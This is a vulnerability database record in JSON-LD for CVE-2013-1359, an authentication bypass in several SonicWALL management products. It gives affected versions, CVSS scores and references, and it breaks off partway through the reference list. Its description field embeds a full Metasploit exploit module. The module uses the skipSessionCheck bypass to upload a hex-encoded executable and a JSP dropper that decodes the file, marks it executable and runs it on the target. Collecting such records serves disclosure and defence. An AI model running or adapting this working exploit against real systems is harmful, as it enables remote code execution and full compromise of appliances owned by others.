"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-0532",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "analyzer",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "4.1"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "5.0"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "5.1"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "6.0"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "universal management appliance",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "5.1"
},
{
"model": "universal management appliance",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "6.0"
},
{
"model": "universal management appliance",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "viewpoint",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "4.1"
},
{
"model": "viewpoint",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "5.0"
},
{
"model": "viewpoint",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "6.0"
},
{
"model": "viewpoint",
"scope": "eq",
"trust": 0.8,
"vendor": "sonicwall",
"version": "5.1"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007224"
},
{
"db": "NVD",
"id": "CVE-2013-1359"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1359"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nikolas Sotiriu",
"sources": [
{
"db": "BID",
"id": "57445"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-377"
}
],
"trust": 0.9
},
"cve": "CVE-2013-1359",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2013-007224",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-61361",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2013-007224",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-1359",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2013-007224",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201301-377",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-61361",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61361"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007224"
},
{
"db": "NVD",
"id": "CVE-2013-1359"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-377"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. \nAttackers can exploit this issue to gain administrative access to the web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully compromise the system. \nThe following versions are affected:\nGMS/Analyzer/UMA 7.0.x\nGMS/ViewPoint/UMA 6.0.x\nGMS/ViewPoint/UMA 5.1.x\nGMS/ViewPoint 5.0.x\nGMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products. ##\n# This file is part of the Metasploit Framework and may be subject to\n# redistribution and commercial restrictions. Please see the Metasploit\n# web site for more information on licensing and terms of use. \n# http://metasploit.com/\n##\n\nrequire \u0027msf/core\u0027\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n\tRank = GoodRanking\n\n\tHttpFingerprint = { :pattern =\u003e [ /Apache-Coyote/ ] }\n\n\tinclude Msf::Exploit::Remote::HttpClient\n\tinclude Msf::Exploit::EXE\n\tinclude Msf::Exploit::FileDropper\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t\u0027Name\u0027 =\u003e \u0027SonicWALL GMS 6 Arbitrary File Upload\u0027,\n\t\t\t\u0027Description\u0027 =\u003e %q{\n\t\t\t\t\tThis module exploits a code execution flaw in SonicWALL GMS. It exploits two\n\t\t\t\tvulnerabilities in order to get its objective. An authentication bypass in the\n\t\t\t\tWeb Administration interface allows to abuse the \"appliance\" application and upload\n\t\t\t\tan arbitrary payload embedded in a JSP. The module has been tested successfully on\n\t\t\t\tSonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual\n\t\t\t\tAppliance (Linux). On the Virtual Appliance the linux meterpreter hasn\u0027t run\n\t\t\t\tsuccessfully while testing, shell payload have been used. \n\t\t\t},\n\t\t\t\u0027Author\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t\u0027Nikolas Sotiriu\u0027, # Vulnerability Discovery\n\t\t\t\t\t\u0027Julian Vilas \u003cjulian.vilas[at]gmail.com\u003e\u0027, # Metasploit module\n\t\t\t\t\t\u0027juan vazquez\u0027 # Metasploit module\n\t\t\t\t],\n\t\t\t\u0027License\u0027 =\u003e MSF_LICENSE,\n\t\t\t\u0027References\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027CVE\u0027, \u00272013-1359\u0027],\n\t\t\t\t\t[ \u0027OSVDB\u0027, \u002789347\u0027 ],\n\t\t\t\t\t[ \u0027BID\u0027, \u002757445\u0027 ],\n\t\t\t\t\t[ \u0027EDB\u0027, \u002724204\u0027 ]\n\t\t\t\t],\n\t\t\t\u0027Privileged\u0027 =\u003e true,\n\t\t\t\u0027Platform\u0027 =\u003e [ \u0027win\u0027, \u0027linux\u0027 ],\n\t\t\t\u0027Targets\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2\u0027,\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Arch\u0027 =\u003e ARCH_X86,\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027\n\t\t\t\t\t\t}\n\t\t\t\t\t],\n\t\t\t\t\t[ \u0027SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)\u0027,\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Arch\u0027 =\u003e ARCH_X86,\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027linux\u0027\n\t\t\t\t\t\t}\n\t\t\t\t\t]\n\t\t\t\t],\n\t\t\t\u0027DefaultTarget\u0027 =\u003e 0,\n\t\t\t\u0027DisclosureDate\u0027 =\u003e \u0027Jan 17 2012\u0027))\n\n\t\tregister_options(\n\t\t\t[\n\t\t\t\tOpt::RPORT(80),\n\t\t\t\tOptString.new(\u0027TARGETURI\u0027, [true, \u0027Path to SonicWall GMS\u0027, \u0027/\u0027])\n\t\t\t], self.class)\n\tend\n\n\n\tdef on_new_session\n\t\t# on_new_session will force stdapi to load (for Linux meterpreter)\n\tend\n\n\n\tdef generate_jsp\n\t\tvar_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_exepath = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_data = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_bytes = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_counter = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_char1 = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_char2 = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_comb = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_exe = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\t@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_proc = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_fperm = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_fdel = Rex::Text.rand_text_alpha(rand(8)+8)\n\n\t\tjspraw = \"\u003c%@ page import=\\\"java.io.*\\\" %\u003e\\n\"\n\t\tjspraw \u003c\u003c \"\u003c%\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_hexpath} = application.getRealPath(\\\"/\\\") + \\\"/#{@var_hexfile}.txt\\\";\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_exepath} = System.getProperty(\\\"java.io.tmpdir\\\") + \\\"/#{var_exe}\\\";\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_data} = \\\"\\\";\\n\"\n\n\t\tjspraw \u003c\u003c \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") != -1){\\n\"\n\t\tjspraw \u003c\u003c \"#{var_exepath} = #{var_exepath}.concat(\\\".exe\\\");\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\\n\"\n\t\tjspraw \u003c\u003c \"FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\\n\"\n\n\t\tjspraw \u003c\u003c \"int #{var_numbytes} = #{var_inputstream}.available();\\n\"\n\t\tjspraw \u003c\u003c \"byte #{var_bytearray}[] = new byte[#{var_numbytes}];\\n\"\n\t\tjspraw \u003c\u003c \"#{var_inputstream}.read(#{var_bytearray});\\n\"\n\t\tjspraw \u003c\u003c \"#{var_inputstream}.close();\\n\"\n\n\t\tjspraw \u003c\u003c \"byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\\n\"\n\t\tjspraw \u003c\u003c \"for (int #{var_counter} = 0; #{var_counter} \u003c #{var_numbytes}; #{var_counter} += 2)\\n\"\n\t\tjspraw \u003c\u003c \"{\\n\"\n\t\tjspraw \u003c\u003c \"char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\\n\"\n\t\tjspraw \u003c\u003c \"char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\\n\"\n\t\tjspraw \u003c\u003c \"int #{var_comb} = Character.digit(#{var_char1}, 16) \u0026 0xff;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_comb} \u003c\u003c= 4;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_comb} += Character.digit(#{var_char2}, 16) \u0026 0xff;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"#{var_outputstream}.write(#{var_bytes});\\n\"\n\t\tjspraw \u003c\u003c \"#{var_outputstream}.close();\\n\"\n\n\t\tjspraw \u003c\u003c \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") == -1){\\n\"\n\t\tjspraw \u003c\u003c \"String[] #{var_fperm} = new String[3];\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[0] = \\\"chmod\\\";\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[1] = \\\"+x\\\";\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[2] = #{var_exepath};\\n\"\n\t\tjspraw \u003c\u003c \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\\n\"\n\t\tjspraw \u003c\u003c \"if (#{var_proc}.waitFor() == 0) {\\n\"\n\t\tjspraw \u003c\u003c \"#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\t\t# Linux and other UNICES allow removing files while they are in use... \n\t\tjspraw \u003c\u003c \"File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\\n\"\n\t\tjspraw \u003c\u003c \"} else {\\n\"\n\t\t# Windows does not .. \n\t\tjspraw \u003c\u003c \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"%\u003e\\n\"\n\t\treturn jspraw\n\tend\n\n\tdef get_install_path\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t\t\t\u0027connection\u0027 =\u003e \u0027TE, close\u0027,\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027TE\u0027 =\u003e \"deflate,gzip;q=0.3\",\n\t\t\t\t\t},\n\t\t\t\t\u0027vars_post\u0027 =\u003e {\n\t\t\t\t\t\u0027num\u0027 =\u003e \u0027123456\u0027,\n\t\t\t\t\t\u0027action\u0027 =\u003e \u0027show_diagnostics\u0027,\n\t\t\t\t\t\u0027task\u0027 =\u003e \u0027search\u0027,\n\t\t\t\t\t\u0027item\u0027 =\u003e \u0027application_log\u0027,\n\t\t\t\t\t\u0027criteria\u0027 =\u003e \u0027*.*\u0027,\n\t\t\t\t\t\u0027width\u0027 =\u003e \u0027500\u0027\n\t\t\t\t}\n\t\t\t})\n\n\t\tif res and res.code == 200 and res.body =~ /VALUE=\"(.*)logs/\n\t\t\treturn $1\n\t\tend\n\n\t\treturn nil\n\tend\n\n\tdef upload_file(location, filename, contents)\n\t\tpost_data = Rex::MIME::Message.new\n\t\tpost_data.add_part(\"file_system\", nil, nil, \"form-data; name=\\\"action\\\"\")\n\t\tpost_data.add_part(\"uploadFile\", nil, nil, \"form-data; name=\\\"task\\\"\")\n\t\tpost_data.add_part(location, nil, nil, \"form-data; name=\\\"searchFolder\\\"\")\n\t\tpost_data.add_part(contents, \"application/octet-stream\", nil, \"form-data; name=\\\"uploadFilename\\\"; filename=\\\"#{filename}\\\"\")\n\n\t\tdata = post_data.to_s\n\t\tdata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\")\n\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t\t\t\u0027data\u0027 =\u003e data,\n\t\t\t\t\u0027ctype\u0027 =\u003e \"multipart/form-data; boundary=#{post_data.bound}\",\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027TE\u0027 =\u003e \"deflate,gzip;q=0.3\",\n\t\t\t\t\t},\n\t\t\t\t\u0027connection\u0027 =\u003e \u0027TE, close\u0027\n\t\t\t})\n\n\t\tif res and res.code == 200 and res.body.empty?\n\t\t\treturn true\n\t\telse\n\t\t\treturn false\n\t\tend\n\tend\n\n\tdef check\n\t\t@peer = \"#{rhost}:#{rport}\"\n\t\t@uri = normalize_uri(target_uri.path)\n\t\t@uri \u003c\u003c \u0027/\u0027 if @uri[-1,1] != \u0027/\u0027\n\n\t\tif get_install_path.nil?\n\t\t\treturn Exploit::CheckCode::Safe\n\t\tend\n\n\t\treturn Exploit::CheckCode::Vulnerable\n\tend\n\n\tdef exploit\n\t\t@peer = \"#{rhost}:#{rport}\"\n\t\t@uri = normalize_uri(target_uri.path)\n\t\t@uri \u003c\u003c \u0027/\u0027 if @uri[-1,1] != \u0027/\u0027\n\n\t\t# Get Tomcat installation path\n\t\tprint_status(\"#{@peer} - Retrieving Tomcat installation path...\")\n\t\tinstall_path = get_install_path\n\n\t\tif install_path.nil?\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Unable to retrieve the Tomcat installation path\")\n\t\tend\n\n\t\tprint_good(\"#{@peer} - Tomcat installed on #{install_path}\")\n\n\t\tif target[\u0027Platform\u0027] == \"linux\"\n\t\t\t@location = \"#{install_path}webapps/appliance/\"\n\t\telsif target[\u0027Platform\u0027] == \"win\"\n\t\t\t@location = \"#{install_path}webapps\\\\appliance\\\\\"\n\t\tend\n\n\n\t\t# Upload the JSP and the raw payload\n\t\t@jsp_name = rand_text_alphanumeric(8+rand(8))\n\n\t\tjspraw = generate_jsp\n\n\t\t# Specify the payload in hex as an extra file.. \n\t\tpayload_hex = payload.encoded_exe.unpack(\u0027H*\u0027)[0]\n\n\t\tprint_status(\"#{@peer} - Uploading the payload\")\n\n\t\tif upload_file(@location, \"#{@var_hexfile}.txt\", payload_hex)\n\t\t\tprint_good(\"#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt\")\n\t\telse\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the Payload\")\n\t\tend\n\n\t\tprint_status(\"#{@peer} - Uploading the payload\")\n\n\t\tif upload_file(@location, \"#{@jsp_name}.jsp\", jspraw)\n\t\t\tprint_good(\"#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp\")\n\t\telse\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the jsp\")\n\t\tend\n\n\t\tprint_status(\"Triggering payload at \u0027#{@uri}#{@jsp_name}.jsp\u0027 ...\")\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}appliance/#{@jsp_name}.jsp\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027GET\u0027\n\t\t\t})\n\n\t\tif res and res.code != 200\n\t\t\tprint_warning(\"#{@peer} - Error triggering the payload\")\n\t\tend\n\n\t\tregister_files_for_cleanup(\"#{@location}#{@var_hexfile}.txt\")\n\t\tregister_files_for_cleanup(\"#{@location}#{@jsp_name}.jsp\")\n\tend\n\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1359"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007224"
},
{
"db": "BID",
"id": "57445"
},
{
"db": "VULHUB",
"id": "VHN-61361"
},
{
"db": "PACKETSTORM",
"id": "119808"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-61361",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61361"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-1359",
"trust": 2.9
},
{
"db": "BID",
"id": "57445",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1028007",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "24204",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "24322",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007224",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201301-377",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "119808",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-77937",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-78054",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-61361",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61361"
},
{
"db": "BID",
"id": "57445"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007224"
},
{
"db": "PACKETSTORM",
"id": "119808"
},
{
"db": "NVD",
"id": "CVE-2013-1359"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-377"
}
]
},
"id": "VAR-202002-0532",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-61361"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:49:50.845000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.sonicwall.com/"
},
{
"title": "Multiple SonicWALL Product verification bypass fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=108920"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007224"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-377"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61361"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007224"
},
{
"db": "NVD",
"id": "CVE-2013-1359"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://seclists.org/fulldisclosure/2013/jan/125"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/24204"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/24322"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/57445"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1028007"
},
{
